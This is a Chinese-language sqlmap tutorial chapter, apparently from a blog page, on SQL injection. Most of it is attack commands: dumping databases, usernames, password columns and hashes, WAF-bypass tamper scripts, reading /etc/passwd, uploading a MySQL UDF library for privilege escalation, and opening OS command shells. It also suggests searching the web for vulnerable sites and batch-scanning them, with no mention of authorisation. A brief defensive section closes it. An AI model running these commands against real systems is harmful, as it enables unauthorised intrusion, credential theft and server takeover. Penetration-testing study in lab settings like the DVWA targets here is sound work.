sqlmap从入门到精通-第二章-2-4-sqlmap使用攻略及技巧(2)

https://www.bilibili.com/video/av840841045

2.4.4 检测和利用SQL注入

1.手工判断是否存在漏洞

针对可能存在SQL注入漏洞的URL添加+AND+1=1 和 +AND+1=2 看返回的结果是否一致,如果不一致那么就存在SQL注入

2.sqlmap自动检测

实际测试使用sqlmap的过程中会一直提示你应答,有交互的过程,可以通过参数--batch 来完成自动应答的效果

3.寻找和判断实例

可以通过百度或者谷歌使用相关语法进行搜索,这里不做具体细节演示,可以搜索Google Hack语法

4.批量检测

可以将收集到可能存在SQL注意漏洞的URL放在一个文本文件中,例如:将所有的URL地址保存 bmfx.txt ,然后使用sqlmap.py -m bmfx.txt 即可开始进行批量注入探测,注意bmfx.txt文件需要和sqlmap在同一个目录下,否则sqlmap找不到对应的文件

2.4.5 直接连接数据库

sqlmap直接连接数据库的命令如下:

sqlmap.py -d "mysql://root:root@192.168.91.130:3306/dvwa" -f --banner --dbs --users

2.4.6 数据库相关操作

1.列数据库信息:--dbs

2.目标站点当前Web所使用的数据库:--current-db

3.目标站点当前Web所使用数据库的账户:--current-user

4.列出目标站点数据库的所有用户:--users

5.列出目标站点数据库的密码:--passwords

6.指定库名列出所有表:-D database --tables

参数说明:

-D 指定数据库名称

7.指定库名表名列出所有字段:-D bmfx_com -T root --columns

参数说明:

-T 指定要列出字段的表

8.指定库名表名字段dump出指定字段:

-D bmfx_com -T admin -C id,username,password --dump

-D bmfx_com -T admin -C "id,username,password" --dump

上面可以加双引号,也可以不加双引号

9.导出多少条数据:

-D bmfx_com -T admin -C id,username,password --start 1 --stop 10 --dump

参数说明:

--start 指定开始的行

--stop  指定结束的行

上述含义就是导出id,username,password 的1-10行的数据内容

2.4.7 sqlmap使用技巧

1.MySQL的注释方法绕过WAF进行SQL注入

(1) 使用sqlmap进行注入测试:

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper "halfversionedmorekeywords.py"

(2) 其他绕过WAF脚本的方法

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper tamper/between.py, tamper/randomcase.py -v 3

(4) tamper目录下文件的具体含义:

space2comment    空格替换为/**/

apostrophemask    单引号替换为UTF-8字符

equaltolike    等号替换为like

space2dash    空格替换为–加随机字符 ; 绕过过滤'=' 替换空格字符(' ') , ('-') 跟一个破折号注释,一个随机字符串和一个新行('n')

greatest    大于号替换为greatest;绕过过滤'>',用GREATEST替换大于号

space2hash    空格替换为#加随机字符; 空格替换为#,随机字符串及换行符

apostrophenullencode    替换双引号为%00%27;绕过过滤双引号,替换字符和双引号

halfversionedmorekeywords  在每个关键字前加注释

space2morehash    空格替换为#加更多的随机字符及换行符

appendnullbyte    在有效载荷结束位置加载零字节字符编码 例如:%00

ifnull2ifisnull  绕过对IFNULL过滤,替换类似IFNULL(A,B)为IF(ISNULL(A),B,A)

space2mssqlblank    空格替换为其他空符号 ; 替换空格

modsecurityversioned  过滤空格,包含完整的查询版本的注释

base64encode    使用base64编码替换

space2mssqlhash    空格替换为%23%0A

space2mysqldash  替换空格字符(''),('-') 后跟一个破折号注释一个新行('n')

space2mysqlblank    空格替换为其他空白符号(Mysql)

between    比较符替换为between ; 用between替换大于号(>)

multiplespaces    围绕SQL关键字添加多个空格

space2plus    空格替换为加号 ; 用+替换空格

bluecoat    代替空格字符后与一个有效的随机空白字符的SQL语句,等号替换为like

nonrecursivereplacement    双重查询语句取代SQL关键字;替换预定义关键字

space2randomblank    代理空格字符(""),从空白字符集中选择&09,%0A,%0C,%0D 来替代空白符

sp_password    追加sp_password,从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode    双url编码(不处理已编码的)

unionalltounion    union all select替换为union select

charencode    URL编码

randomcase    字符大小写随机替换;随机大小写

unmagicquotes    宽字符绕过GPC addslashes

randomcomments  使用/**/分割SQL关键字

charunicodeencode    字符串unicode编码

securesphere    追加特制的字符串

versionedmorekeywords    使用注释绕过

2.URL重写SQL注入测试

value1 为测试参数,加"*" 即可,sqlmap将会测试value1的位置是否存在注入

sqlmap.py -u "http://targeturl/paraml/value1*/param2/value2"

3.列举并破解密码哈希值

当前用户有权限读取包含用户密码的权限时,sqlmap会先列举出用户,然后列出Hash,并尝试破解

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --passwords -v 1

4.获取表中的数据个数

代码如下:

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --count -D bmfxdb

5.对网站xxx.com进行漏洞爬取

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --crawl=3

6.基于布尔SQL注入预估时间

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --b --eta

7.使用hex避免字符编码导致数据丢失

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --banner --hex -v 3 --parse-errors

8.模拟测试手机环境站点

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --mobile

9.智能判断测试

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --smart

10.结合burpsuite进行注入

代码如下:

通过burpsuite抓包,需要设置burpsuite记录请求日志

sqlmap.py -r burpsuite.txt

指定表单注入:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --data "username=root&password=root"

11.sqlmap自动填写表单注入

sqlmap.py -u URL --forms

sqlmap.py -u URL --forms --dbs

sqlmap.py -u URL --forms --current-db

sqlmap.py -u URL --forms -D 数据库名 --tables

sqlmap.py -u URL --forms -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --forms -D 数据库名 -T 表名 -C username,password --dump

12.读取Linux下的文件

代码如下:

sqlmap.py -u URL --file /etc/passwd

13.延时注入

代码如下:

sqlmap.py -u URL --technique -T --current-user

14.sqlmap结合Burpsuite进行post注入

结合Burpsuite来使用sqlmap

使用Burpsuite一个POST登录的请求数据包,然后保存为bmfx.txt ,并保存在sqlmap目录下面,运行如下命令

sqlmap.py -r bmfx.txt -p tfUPass

15.sqlmap Cookies注入

代码如下:

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --dbs --level 2

默认情况下sqlmap只支持get/post参数的注入测试,但是如果使用--level 设置其参数数值大于等于2的时候,sqlmap就会去检查Cookie中的参数,当大于等于3的时候就会去检查User-Agent和Referer,可以通过Burpsuite获取Cookie值,然后开始注入:

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3--dbs

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 --current-db

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 --tables

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 -C username,password --dump

16.Mysql提权

(1) 连接Mysql数据打开一个交互shell:

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --sql-shell

select @@version;

select @@plugin_dir;

D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\

(2) 利用slqmap上传lib_mysqludf_sys到Mysql插件目录

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --file-write=D:/tmp/lib_mysqludf_sys.dll --file-dest=D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

select sys_eval('ver');

17.执行shell命令

代码如下:

sqlmap.py -u URL --os-cmd="net user"  执行net user命令

sqlmap.py -u URL --os-shell  系统交互式shell

18.延时注入

代码如下:

sqlmap.py -u URL --delay 0.5  延时0.5秒

sqlmap.py -u URL --safe-freq  请求2次

2.4.8 安全防范

利用sqlmap进行的所有攻击都是因为存在安全漏洞,因此建议的安全防范防范如下:

(1) 对源代码进行安全代码审计,对存在安全漏洞的代码进行修补

(2) 在网站部署云安全防护,如云盾,安全狗等各种安全防护软件

(3) 定期查看网站安全日志,分析主要访问来源,对涉及可能攻击的页面进行检查


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,590评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,808评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,151评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,779评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,773评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,656评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,022评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,678评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,038评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,756评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,411评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,005评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,973评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,053评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,495评论 2 343